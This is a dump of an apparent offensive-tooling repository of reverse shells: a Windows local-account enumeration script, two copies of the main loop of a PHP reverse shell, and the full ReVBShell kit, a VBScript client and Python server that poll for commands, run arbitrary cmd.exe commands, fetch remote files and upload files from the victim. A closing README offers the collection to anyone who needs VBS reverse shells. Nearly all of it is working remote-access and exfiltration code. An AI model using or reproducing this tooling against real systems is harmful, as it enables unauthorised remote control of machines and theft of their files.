| Const 
ForReading = 1, ForWriting = 2 3 | Dim fso, f 4 | Set fso = CreateObject("Scripting.FileSystemObject") 5 | Set f = fso.OpenTextFile("testfile.txt", ForWriting, True) 6 | 7 | strComputer = "." 8 | Set objWMIService = GetObject("winmgmts:" _ 9 | & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") 10 | 11 | Set colItems = objWMIService.ExecQuery _ 12 | ("Select * from Win32_UserAccount Where LocalAccount = True") 13 | 14 | For Each objItem in colItems 15 | f.WriteLine("Account Type: " & objItem.AccountType) 16 | f.WriteLine("Caption: " & objItem.Caption ) 17 | f.WriteLine("Description: " & objItem.Description ) 18 | f.WriteLine("Disabled: " & objItem.Disabled ) 19 | f.WriteLine("Domain: " & objItem.Domain ) 20 | f.WriteLine("Full Name: " & objItem.FullName ) 21 | f.WriteLine("InstallDate: " & objItem.InstallDate ) 22 | f.WriteLine("Local Account: " & objItem.LocalAccount ) 23 | f.WriteLine("Lockout: " & objItem.Lockout ) 24 | f.WriteLine("Name: " & objItem.Name ) 25 | f.WriteLine("Password Changeable: " & objItem.PasswordChangeable ) 26 | f.WriteLine("Password Expires: " & objItem.PasswordExpires ) 27 | f.WriteLine("Password Required: " & objItem.PasswordRequired ) 28 | f.WriteLine("SID: " & objItem.SID ) 29 | f.WriteLine("SID Type: " & objItem.SIDType ) 30 | f.WriteLine("Status: " & objItem.Status ) 31 | f.WriteLine(" ") 32 | 33 | Next 34 | 35 | f.Close 36 | -------------------------------------------------------------------------------- /ReverseShell/php-reverse-shell: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 99 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 100 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 101 | ); 102 | $process = proc_open($shell, $descriptorspec, $pipes); 103 | if (!is_resource($process)) { 104 | printit("ERROR: Can't spawn shell"); 105 | exit(1); 106 | } 107 
| // Set everything to non-blocking 108 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 109 | stream_set_blocking($pipes[0], 0); 110 | stream_set_blocking($pipes[1], 0); 111 | stream_set_blocking($pipes[2], 0); 112 | stream_set_blocking($sock, 0); 113 | printit("Successfully opened reverse shell to $ip:$port"); 114 | while (1) { 115 | // Check for end of TCP connection 116 | if (feof($sock)) { 117 | printit("ERROR: Shell connection terminated"); 118 | break; 119 | } 120 | // Check for end of STDOUT 121 | if (feof($pipes[1])) { 122 | printit("ERROR: Shell process terminated"); 123 | break; 124 | } 125 | // Wait until a command is end down $sock, or some 126 | // command output is available on STDOUT or STDERR 127 | $read_a = array($sock, $pipes[1], $pipes[2]); 128 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 129 | // If we can read from the TCP socket, send 130 | // data to process's STDIN 131 | if (in_array($sock, $read_a)) { 132 | if ($debug) printit("SOCK READ"); 133 | $input = fread($sock, $chunk_size); 134 | if ($debug) printit("SOCK: $input"); 135 | fwrite($pipes[0], $input); 136 | } 137 | // If we can read from the process's STDOUT 138 | // send data down tcp connection 139 | if (in_array($pipes[1], $read_a)) { 140 | if ($debug) printit("STDOUT READ"); 141 | $input = fread($pipes[1], $chunk_size); 142 | if ($debug) printit("STDOUT: $input"); 143 | fwrite($sock, $input); 144 | } 145 | // If we can read from the process's STDERR 146 | // send data down tcp connection 147 | if (in_array($pipes[2], $read_a)) { 148 | if ($debug) printit("STDERR READ"); 149 | $input = fread($pipes[2], $chunk_size); 150 | if ($debug) printit("STDERR: $input"); 151 | fwrite($sock, $input); 152 | } 153 | } 154 | fclose($sock); 155 | fclose($pipes[0]); 156 | fclose($pipes[1]); 157 | fclose($pipes[2]); 158 | proc_close($process); 159 | // Like print, but does nothing if we've daemonised ourself 160 | // (I can't 
figure out how to redirect STDOUT like a proper daemon) 161 | function printit ($string) { 162 | if (!$daemon) { 163 | print "$string\n"; 164 | } 165 | } 166 | ?> 167 | -------------------------------------------------------------------------------- /ReverseShell/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 99 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 100 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 101 | ); 102 | $process = proc_open($shell, $descriptorspec, $pipes); 103 | if (!is_resource($process)) { 104 | printit("ERROR: Can't spawn shell"); 105 | exit(1); 106 | } 107 | // Set everything to non-blocking 108 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 109 | stream_set_blocking($pipes[0], 0); 110 | stream_set_blocking($pipes[1], 0); 111 | stream_set_blocking($pipes[2], 0); 112 | stream_set_blocking($sock, 0); 113 | printit("Successfully opened reverse shell to $ip:$port"); 114 | while (1) { 115 | // Check for end of TCP connection 116 | if (feof($sock)) { 117 | printit("ERROR: Shell connection terminated"); 118 | break; 119 | } 120 | // Check for end of STDOUT 121 | if (feof($pipes[1])) { 122 | printit("ERROR: Shell process terminated"); 123 | break; 124 | } 125 | // Wait until a command is end down $sock, or some 126 | // command output is available on STDOUT or STDERR 127 | $read_a = array($sock, $pipes[1], $pipes[2]); 128 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 129 | // If we can read from the TCP socket, send 130 | // data to process's STDIN 131 | if (in_array($sock, $read_a)) { 132 | if ($debug) printit("SOCK READ"); 133 | $input = fread($sock, $chunk_size); 134 | if ($debug) printit("SOCK: $input"); 135 | fwrite($pipes[0], $input); 136 | } 137 | // If we can read from the process's 
STDOUT 138 | // send data down tcp connection 139 | if (in_array($pipes[1], $read_a)) { 140 | if ($debug) printit("STDOUT READ"); 141 | $input = fread($pipes[1], $chunk_size); 142 | if ($debug) printit("STDOUT: $input"); 143 | fwrite($sock, $input); 144 | } 145 | // If we can read from the process's STDERR 146 | // send data down tcp connection 147 | if (in_array($pipes[2], $read_a)) { 148 | if ($debug) printit("STDERR READ"); 149 | $input = fread($pipes[2], $chunk_size); 150 | if ($debug) printit("STDERR: $input"); 151 | fwrite($sock, $input); 152 | } 153 | } 154 | fclose($sock); 155 | fclose($pipes[0]); 156 | fclose($pipes[1]); 157 | fclose($pipes[2]); 158 | proc_close($process); 159 | // Like print, but does nothing if we've daemonised ourself 160 | // (I can't figure out how to redirect STDOUT like a proper daemon) 161 | function printit ($string) { 162 | if (!$daemon) { 163 | print "$string\n"; 164 | } 165 | } 166 | ?> 167 | -------------------------------------------------------------------------------- /ReverseShell/revbshell/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Arris Huijgen 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 
19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /ReverseShell/revbshell/README.md: -------------------------------------------------------------------------------- 1 | # ReVBShell 2 | ## Files 3 | * server.py - Interactive Python shell, listening on port 8080 for clients 4 | * client.vbs - Visual Basic Script client which connects to the IP/port specified and periodically fetches commands 5 | 6 | ## Components 7 | ### Server 8 | _Interactive Python shell_ 9 | 10 | **Supported commands** 11 | ``` 12 | - CD [directory] - Change directory. Shows current directory when without parameter. 13 | - DOWNLOAD [path] - Download the file at [path] to the .\Downloads folder. 14 | - GETUID - Get shell user id. 15 | - GETWD - Get working directory. Same as CD. 16 | - HELP - Show this help. 17 | - IFCONFIG - Show network configuration. 18 | - KILL - Stop script on the remote host. 19 | - PS - Show process list. 20 | - PWD - Same as GETWD and CD. 21 | - SET [name] [value] - Set a variable, for example SET LHOST 192.168.1.77. 22 | When entered without parameters, it shows the currently set variables. 
23 | - SHELL [command] - Execute command in cmd.exe interpreter; 24 | When entered without command, switches to SHELL context. 25 | - SHUTDOWN - Exit this commandline interface (does not shutdown the client). 26 | - SYSINFO - Show system information. 27 | - SLEEP [ms] - Set client polling interval; 28 | When entered without ms, shows the current interval. 29 | - UNSET [name] - Unset a variable 30 | - UPLOAD [localpath] - Upload the file at [path] to the remote host. 31 | Note: Variable LHOST is required. 32 | - WGET [url] - Download file from url. 33 | ``` 34 | 35 | ### Client 36 | _VBS client_ 37 | Configuration can be set in the .vbs file itself. 38 | * strHost - IP of host to connect back to; should be the IP of the host where server.py is running 39 | * strPort - Listening port on the above host 40 | * intSleep - Default delay between the polls to the server 41 | 42 | **Default settings** 43 | ``` 44 | strHost = "127.0.0.1" 45 | strPort = "8080" 46 | intSleep = 5000 47 | ``` 48 | -------------------------------------------------------------------------------- /ReverseShell/revbshell/client.vbs: -------------------------------------------------------------------------------- 1 | ' This software is provided under under the BSD 3-Clause License. 2 | ' See the accompanying LICENSE file for more information. 
3 | ' 4 | ' Client for Reverse VBS Shell 5 | ' 6 | ' Author: 7 | ' Arris Huijgen 8 | ' 9 | ' Website: 10 | ' https://github.com/bitsadmin/ReVBShell 11 | ' 12 | 13 | Option Explicit 14 | On Error Resume Next 15 | 16 | ' Instantiate objects 17 | Dim shell: Set shell = CreateObject("WScript.Shell") 18 | Dim fs: Set fs = CreateObject("Scripting.FileSystemObject") 19 | Dim wmi: Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") 20 | Dim http: Set http = CreateObject("WinHttp.WinHttpRequest.5.1") 21 | If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") 22 | If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") 23 | If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") 24 | 25 | ' Initialize variables used by GET/WGET 26 | Dim arrSplitUrl, strFilename, stream 27 | 28 | ' Configuration 29 | Dim strHost, strPort, strUrl, strCD, intSleep 30 | strHost = "127.0.0.1" 31 | strPort = "8080" 32 | intSleep = 5000 33 | strUrl = "http://" & strHost & ":" & strPort 34 | strCD = "." 
35 | 36 | ' Periodically poll for commands 37 | Dim strInfo 38 | While True 39 | ' Fetch next command 40 | http.Open "GET", strUrl & "/", False 41 | http.Send 42 | Dim strRawCommand 43 | strRawCommand = http.ResponseText 44 | 45 | ' Determine command and arguments 46 | Dim arrResponseText, strCommand, strArgument 47 | arrResponseText = Split(strRawCommand, " ", 2) 48 | strCommand = arrResponseText(0) 49 | strArgument = "" 50 | If UBound(arrResponseText) > 0 Then 51 | strArgument = arrResponseText(1) 52 | End If 53 | 54 | ' Fix ups 55 | If strCommand = "PWD" Or strCommand = "GETWD" Then 56 | strCommand = "CD" 57 | strArgument = "" 58 | End If 59 | 60 | ' Execute command 61 | Select Case strCommand 62 | ' Sleep X seconds 63 | Case "NOOP" 64 | WScript.Sleep intSleep 65 | 66 | ' Get host info 67 | Case "SYSINFO" 68 | Dim objOS, strComputer, strOS, strBuild, strServicePack, strArchitecture, strLanguage 69 | For Each objOS in wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem") 70 | strComputer = objOS.CSName 71 | strOS = objOS.Caption 72 | strBuild = objOS.BuildNumber 73 | strServicePack = objOS.CSDVersion 74 | strArchitecture = objOS.OSArchitecture 75 | strLanguage = objOS.OSLanguage 76 | Exit For 77 | Next 78 | 79 | Dim strVersion 80 | strVersion = strOS & " (Build " & strBuild 81 | If strServicePack <> "" Then 82 | strVersion = strVersion & ", " & strServicePack 83 | End If 84 | strVersion = strVersion & ")" 85 | 86 | strInfo = "Computer: " & strComputer & vbCrLf & _ 87 | "OS: " & strVersion & vbCrLf & _ 88 | "Architecture: " & strArchitecture & vbCrLf & _ 89 | "System Language: " & strLanguage 90 | 91 | SendStatusUpdate strRawCommand, strInfo 92 | 93 | ' Current user, including domain 94 | Case "GETUID" 95 | Dim strUserDomain, strUsername 96 | strUserDomain = shell.ExpandEnvironmentStrings("%USERDOMAIN%") 97 | strUsername = shell.ExpandEnvironmentStrings("%USERNAME%") 98 | strInfo = "Username: " & strUserDomain & "\" & strUserName 99 | 100 | SendStatusUpdate 
strRawCommand, strInfo 101 | 102 | ' IP configuration 103 | Case "IFCONFIG" 104 | Dim arrNetworkAdapters: Set arrNetworkAdapters = wmi.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE MACAddress > ''") 105 | Dim objAdapter 106 | strInfo = "" 107 | For Each objAdapter In arrNetworkAdapters 108 | strInfo = strInfo & objAdapter.Description & vbCrLf 109 | If IsArray(objAdapter.IPAddress) Then 110 | strInfo = strInfo & Join(objAdapter.IPAddress, vbCrLf) & vbCrLf & vbCrLf 111 | Else 112 | strInfo = strInfo & "[Interface down]" & vbCrLf & vbCrLf 113 | End If 114 | Next 115 | 116 | ' Remove trailing \r\n's 117 | strInfo = Mid(strInfo, 1, Len(strInfo)-4) 118 | 119 | SendStatusUpdate strRawCommand, strInfo 120 | 121 | ' Process list 122 | Case "PS" 123 | Dim arrProcesses: Set arrProcesses = wmi.ExecQuery("SELECT * FROM Win32_Process") 124 | strInfo = PadRight("PID", 5) & " " & PadRight("Name", 24) & " " & "Session" & " " & PadRight("User", 19) & " " & "Path" & vbCrLf & _ 125 | PadRight("---", 5) & " " & PadRight("----", 24) & " " & "-------" & " " & PadRight("----", 19) & " " & "----" & vbCrLf 126 | Dim objProcess, strPID, strName, strSession, intHresult, strPDomain, strPUsername, strDomainUser, strPath 127 | For Each objProcess In arrProcesses 128 | strPID = objProcess.Handle 129 | strName = objProcess.Name 130 | strSession = objProcess.SessionId 131 | intHresult = objProcess.GetOwner(strPUsername, strPDomain) 132 | Select Case intHresult 133 | Case 0 134 | strDomainUser = strPDomain & "\" & strPUsername 135 | Case 2 136 | strDomainUser = "[Access Denied]" 137 | Case 3 138 | strDomainUser = "[Insufficient Privilege]" 139 | Case 8 140 | strDomainUser = "[Unknown Failure]" 141 | Case Else 142 | strDomainUser = "[Other]" 143 | End Select 144 | 145 | strPath = objProcess.ExecutablePath 146 | 147 | strInfo = strInfo & PadRight(strPid, 5) & " " & PadRight(strName, 24) & " " & PadRight(strSession, 7) & " " & PadRight(strDomainUser, 19) & " " & strPath & vbCrLf 148 
| Next 149 | 150 | ' Remove trailing newline 151 | strInfo = Mid(strInfo, 1, Len(strInfo)-2) 152 | 153 | SendStatusUpdate strRawCommand, strInfo 154 | 155 | ' Set sleep time 156 | Case "SLEEP" 157 | If strArgument <> "" Then 158 | intSleep = CInt(strArgument) 159 | SendStatusUpdate strRawCommand, "Sleep set to " & strArgument & "ms" 160 | Else 161 | Dim strSleep 162 | strSleep = CStr(intSleep) 163 | SendStatusUpdate strRawCommand, "Sleep is currently set to " & strSleep & "ms" 164 | strSleep = Empty 165 | End If 166 | 167 | ' Execute command 168 | Case "SHELL" 169 | 'Execute and write to file 170 | Dim strOutFile: strOutFile = fs.GetSpecialFolder(2) & "\rso.txt" 171 | shell.Run "cmd /C pushd """ & strCD & """ && " & strArgument & "> """ & strOutFile & """ 2>&1", 0, True 172 | 173 | ' Read out file 174 | Dim file: Set file = fs.OpenTextFile(strOutfile, 1) 175 | Dim text 176 | If Not file.AtEndOfStream Then 177 | text = file.ReadAll 178 | Else 179 | text = "[empty result]" 180 | End If 181 | file.Close 182 | fs.DeleteFile strOutFile, True 183 | 184 | ' Set response 185 | SendStatusUpdate strRawCommand, text 186 | 187 | ' Clean up 188 | strOutFile = Empty 189 | text = Empty 190 | 191 | ' Change Directory 192 | Case "CD" 193 | ' Only change directory when argument is provided 194 | If Len(strArgument) > 0 Then 195 | Dim strNewCdPath 196 | strNewCdPath = GetAbsolutePath(strArgument) 197 | 198 | If fs.FolderExists(strNewCdPath) Then 199 | strCD = strNewCdPath 200 | End If 201 | End If 202 | 203 | SendStatusUpdate strRawCommand, strCD 204 | 205 | ' Download a file from a URL 206 | Case "WGET" 207 | ' Determine filename 208 | arrSplitUrl = Split(strArgument, "/") 209 | strFilename = arrSplitUrl(UBound(arrSplitUrl)) 210 | strFilename = GetAbsolutePath(strFilename) 211 | 212 | ' Fetch file 213 | Err.Clear() ' Set error number to 0 214 | http.Open "GET", strArgument, False 215 | http.Send 216 | 217 | If Err.number <> 0 Then 218 | SendStatusUpdate strRawCommand, "Error when 
downloading from " & strArgument & ": " & Err.Description 219 | Else 220 | ' Write to file 221 | Set stream = createobject("Adodb.Stream") 222 | With stream 223 | .Type = 1 'adTypeBinary 224 | .Open 225 | .Write http.ResponseBody 226 | .SaveToFile strFilename, 2 'adSaveCreateOverWrite 227 | End With 228 | 229 | ' Set response 230 | SendStatusUpdate strRawCommand, "File download from " & strArgument & " successful." 231 | End If 232 | 233 | ' Clean up 234 | arrSplitUrl = Array() 235 | strFilename = Empty 236 | 237 | ' Send a file to the server 238 | Case "DOWNLOAD" 239 | Dim strFullSourceFilePath 240 | strFullSourceFilePath = GetAbsolutePath(strArgument) 241 | 242 | ' Only download if file exists 243 | If fs.FileExists(strFullSourceFilePath) Then 244 | ' Determine filename 245 | arrSplitUrl = Split(strFullSourceFilePath, "\") 246 | strFilename = arrSplitUrl(UBound(arrSplitUrl)) 247 | 248 | ' Read the file to memory 249 | Set stream = CreateObject("Adodb.Stream") 250 | stream.Type = 1 ' adTypeBinary 251 | stream.Open 252 | stream.LoadFromFile strFullSourceFilePath 253 | Dim binFileContents 254 | binFileContents = stream.Read 255 | 256 | ' Upload file 257 | DoHttpBinaryPost "upload", strRawCommand, strFilename, binFileContents 258 | 259 | ' Clean up 260 | binFileContents = Empty 261 | ' File does not exist 262 | Else 263 | SendStatusUpdate strRawCommand, "File does not exist: " & strFullSourceFilePath 264 | End If 265 | 266 | ' Clean up 267 | arrSplitUrl = Array() 268 | strFilename = Empty 269 | strFullSourceFilePath = Empty 270 | 271 | ' Self-destruction, exits script 272 | Case "KILL" 273 | SendStatusUpdate strRawCommand, "Goodbye!" 
274 | WScript.Quit 0 275 | 276 | ' Unknown command 277 | Case Else 278 | SendStatusUpdate strRawCommand, "Unknown command" 279 | End Select 280 | 281 | ' Clean up 282 | strRawCommand = Empty 283 | arrResponseText = Array() 284 | strCommand = Empty 285 | strArgument = Empty 286 | strInfo = Empty 287 | Wend 288 | 289 | 290 | Function PadRight(strInput, intLength) 291 | Dim strOutput 292 | strOutput = LEFT(strInput & Space(intLength), intLength) 293 | strOutput = LEFT(strOutput & String(intLength, " "), intLength) 294 | PadRight = strOutput 295 | End Function 296 | 297 | 298 | Function GetAbsolutePath(strPath) 299 | Dim strOutputPath 300 | strOutputPath = "" 301 | 302 | ' Use backslashes 303 | strPath = Replace(strPath, "/", "\") 304 | 305 | ' Absolute paths : \Windows C:\Windows D:\ 306 | ' Relative paths: .. ..\ .\dir .\dir\ dir dir\ dir1\dir2 dir1\dir2\ 307 | If Left(strPath, 1) = "\" Or InStr(1, strPath, ":") <> 0 Then 308 | strOutputPath = strPath 309 | Else 310 | strOutputPath = strCD & "\" & strPath 311 | End If 312 | 313 | GetAbsolutePath = fs.GetAbsolutePathName(strOutputPath) 314 | End Function 315 | 316 | 317 | Function SendStatusUpdate(strText, strData) 318 | Dim binData 319 | binData = StringToBinary(strData) 320 | DoHttpBinaryPost "cmd", strText, "cmdoutput", binData 321 | End Function 322 | 323 | 324 | Function DoHttpBinaryPost(strActionType, strText, strFilename, binData) 325 | ' Compile POST headers and footers 326 | Const strBoundary = "----WebKitFormBoundaryNiV6OvjHXJPrEdnb" 327 | Dim binTextHeader, binText, binDataHeader, binFooter, binConcatenated 328 | binTextHeader = StringToBinary("--" & strBoundary & vbCrLf & _ 329 | "Content-Disposition: form-data; name=""cmd""" & vbCrLf & vbCrLf) 330 | binDataHeader = StringToBinary(vbCrLf & _ 331 | "--" & strBoundary & vbCrLf & _ 332 | "Content-Disposition: form-data; name=""result""; filename=""" & strFilename & """" & vbCrLf & _ 333 | "Content-Type: application/octet-stream" & vbCrLf & vbCrLf) 334 | 
binFooter = StringToBinary(vbCrLf & "--" & strBoundary & "--" & vbCrLf) 335 | 336 | ' Convert command to binary 337 | binText = StringToBinary(strText) 338 | 339 | ' Concatenate POST headers, data elements and footer 340 | Dim stream : Set stream = CreateObject("Adodb.Stream") 341 | stream.Open 342 | stream.Type = 1 ' adTypeBinary 343 | stream.Write binTextHeader 344 | stream.Write binText 345 | stream.Write binDataHeader 346 | stream.Write binData 347 | stream.Write binFooter 348 | stream.Position = 0 349 | binConcatenated = stream.Read(stream.Size) 350 | 351 | ' Post data 352 | http.Open "POST", strUrl & "/" & strActionType, False 353 | http.SetRequestHeader "Content-Length", LenB(binConcatenated) 354 | http.SetRequestHeader "Content-Type", "multipart/form-data; boundary=" & strBoundary 355 | http.SetTimeouts 5000, 60000, 60000, 60000 356 | http.Send binConcatenated 357 | 358 | ' Receive response 359 | DoHttpBinaryPost = http.ResponseText 360 | End Function 361 | 362 | 363 | Function StringToBinary(Text) 364 | Dim stream: Set stream = CreateObject("Adodb.Stream") 365 | stream.Type = 2 'adTypeText 366 | stream.CharSet = "us-ascii" 367 | 368 | ' Store text in stream 369 | stream.Open 370 | stream.WriteText Text 371 | 372 | ' Change stream type To binary 373 | stream.Position = 0 374 | stream.Type = 1 'adTypeBinary 375 | 376 | ' Return binary data 377 | StringToBinary = stream.Read 378 | End Function 379 | -------------------------------------------------------------------------------- /ReverseShell/revbshell/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # This software is provided under under the BSD 3-Clause License. 4 | # See the accompanying LICENSE file for more information. 
5 | # 6 | # Server for Reverse VBS Shell 7 | # 8 | # Author: 9 | # Arris Huijgen 10 | # 11 | # Website: 12 | # https://github.com/bitsadmin/ReVBShell 13 | # 14 | 15 | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer 16 | import cgi 17 | import os 18 | import sys 19 | from Queue import Queue 20 | from threading import Thread 21 | from shutil import copyfile, rmtree 22 | import ntpath 23 | 24 | PORT_NUMBER = 8080 25 | 26 | 27 | class myHandler(BaseHTTPRequestHandler): 28 | def do_GET(self): 29 | # File download 30 | if self.path.startswith('/f/'): 31 | # Compile path 32 | filename = ntpath.basename(self.path) 33 | filepath = './upload/%s' % filename 34 | 35 | # 404 if no valid file 36 | if not os.path.exists(filepath): 37 | self.send_error(404) 38 | return 39 | 40 | # Return file 41 | with open(filepath, 'rb') as f: 42 | self.send_response(200) 43 | self.send_header('content-type', 'application/octet-stream') 44 | self.end_headers() 45 | self.wfile.write(f.read()) 46 | 47 | # Remove file from disk 48 | os.remove(filepath) 49 | 50 | return 51 | 52 | if commands.empty(): 53 | content = 'NOOP' 54 | else: 55 | content = commands.get() 56 | 57 | # Return result 58 | self.send_response(200) 59 | self.send_header('content-type', 'text/plain') 60 | self.end_headers() 61 | self.wfile.write(content) 62 | return 63 | 64 | # Result from executing command 65 | def do_POST(self): 66 | global context 67 | 68 | # File upload 69 | form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD': 'POST'}) 70 | cmd_data = form['cmd'].file.read() 71 | result_filename = form['result'].filename 72 | result_data = form['result'].file.read() 73 | 74 | # Show '> ' command input string after command output 75 | if context: 76 | cmd_data = cmd_data.replace(context + ' ', '') 77 | print cmd_data 78 | 79 | # Store file 80 | if self.path == '/upload': 81 | # Create folder if required 82 | if not os.path.exists('Downloads'): 83 | os.mkdir('Downloads') 84 | 85 | # 
Write file to disk 86 | with file(os.path.join('Downloads', result_filename), 'wb') as f: 87 | f.write(result_data) 88 | 89 | print 'File \'%s\' downloaded.' % result_filename 90 | # Print output 91 | else: 92 | print result_data 93 | 94 | sys.stdout.write('%s> ' % context) 95 | 96 | # Respond 97 | self.send_response(200) 98 | self.send_header('content-type', 'text/plain') 99 | self.end_headers() 100 | self.wfile.write('OK') 101 | return 102 | 103 | # Do not write log messages to console 104 | def log_message(self, format, *args): 105 | return 106 | 107 | 108 | def run_httpserver(): 109 | #commands.put('GET C:\\secret.bin') 110 | #commands.put('SHELL dir C:\\') 111 | #commands.put('SHELL type client.vbs') 112 | global server 113 | server = HTTPServer(('', PORT_NUMBER), myHandler) 114 | server.serve_forever() 115 | 116 | commands = Queue() 117 | server = None 118 | context = '' 119 | variables = {} 120 | 121 | def main(): 122 | # Start HTTP server thread 123 | #run_httpserver() # Run without treads for debugging purposes 124 | httpserver = Thread(target=run_httpserver) 125 | httpserver.start() 126 | 127 | # Loop to add new commands 128 | global context, variables 129 | s = '' 130 | while True: 131 | s = raw_input('%s> ' % context) 132 | s = s.strip() 133 | splitcmd = s.split(' ', 1) 134 | cmd = splitcmd[0].upper() 135 | 136 | # In a context 137 | if context == 'SHELL' and cmd != 'CD': 138 | cmd = context 139 | 140 | if s.upper() == 'EXIT': 141 | context = '' 142 | continue 143 | else: 144 | args = s 145 | 146 | # Ignore empty commands 147 | if not args: 148 | continue 149 | # No context 150 | else: 151 | args = '' 152 | if len(splitcmd) > 1: 153 | args = splitcmd[1] 154 | 155 | # Ignore empty commands 156 | if not cmd: 157 | continue 158 | 159 | # UPLOAD 160 | elif cmd == 'UPLOAD': 161 | args = args.strip("\"") 162 | 163 | # Check file existence 164 | if not os.path.exists(args): 165 | print 'File not found: %s' % args 166 | continue 167 | 168 | # Check if LHOST 
variable is set 169 | if 'LHOST' not in variables: 170 | print 'Variable LHOST not set' 171 | continue 172 | lhost = variables['LHOST'] 173 | 174 | # Create folder if required 175 | if not os.path.exists('upload'): 176 | os.mkdir('upload') 177 | 178 | # Copy file 179 | filename = ntpath.basename(args) 180 | copyfile(args, './upload/%s' % filename) 181 | 182 | # Update command and args 183 | cmd = 'WGET' 184 | args = 'http://%s:%d/f/%s' % (lhost, PORT_NUMBER, filename) 185 | 186 | # UNSET 187 | elif cmd == 'UNSET': 188 | if args.upper() in variables: 189 | del variables[args.upper()] 190 | continue 191 | 192 | # SHELL 193 | elif cmd == 'SHELL' and not args: 194 | context = 'SHELL' 195 | continue 196 | 197 | # SET 198 | elif cmd == 'SET': 199 | if args: 200 | (variable, value) = args.split(' ') 201 | variables[variable.upper()] = value 202 | else: 203 | print '\n'.join('%s: %s' % (key, value) for key,value in variables.iteritems()) 204 | continue 205 | 206 | # HELP 207 | elif cmd == 'HELP': 208 | print 'Supported commands:\n' \ 209 | '- CD [directory] - Change directory. Shows current directory when without parameter.\n' \ 210 | '- DOWNLOAD [path] - Download the file at [path] to the .\\Downloads folder.\n' \ 211 | '- GETUID - Get shell user id.\n' \ 212 | '- GETWD - Get working directory. 
Same as CD.\n' \ 213 | '- HELP - Show this help.\n' \ 214 | '- IFCONFIG - Show network configuration.\n' \ 215 | '- KILL - Stop script on the remote host.\n' \ 216 | '- PS - Show process list.\n' \ 217 | '- PWD - Same as GETWD and CD.\n' \ 218 | '- SET [name] [value] - Set a variable, for example SET LHOST 192.168.1.77.\n' \ 219 | ' When entered without parameters, it shows the currently set variables.\n' \ 220 | '- SHELL [command] - Execute command in cmd.exe interpreter;\n' \ 221 | ' When entered without command, switches to SHELL context.\n' \ 222 | '- SHUTDOWN - Exit this commandline interface (does not shutdown the client).\n' \ 223 | '- SYSINFO - Show sytem information.\n' \ 224 | '- SLEEP [ms] - Set client polling interval;\n' \ 225 | ' When entered without ms, shows the current interval.\n' \ 226 | '- UNSET [name] - Unset a variable\n' \ 227 | '- UPLOAD [localpath] - Upload the file at [path] to the remote host.\n' \ 228 | ' Note: Variable LHOST is required.\n' \ 229 | '- WGET [url] - Download file from url.\n' 230 | continue 231 | 232 | # SHUTDOWN 233 | elif cmd == 'SHUTDOWN': 234 | server.shutdown() 235 | if os.path.exists('./upload'): 236 | rmtree('./upload') 237 | print 'Shutting down %s' % os.path.basename(__file__) 238 | exit(0) 239 | 240 | commands.put(' '.join([cmd, args])) 241 | 242 | if __name__ == '__main__': 243 | main() -------------------------------------------------------------------------------- /ReverseShell/vbs-reverse-shell/README.rst: -------------------------------------------------------------------------------- 1 | Description 2 | =========== 3 | 4 | Collection of VBS reverse shells 5 | 6 | VBS reverse shells are a bit tricky because there's no easy way to interact 7 | with raw sockets from VBS natively on Windows. However, since powershell 8 | isn't always available on the target computer, VBS reverse shells have a real 9 | value. So if you need them, they're here! 
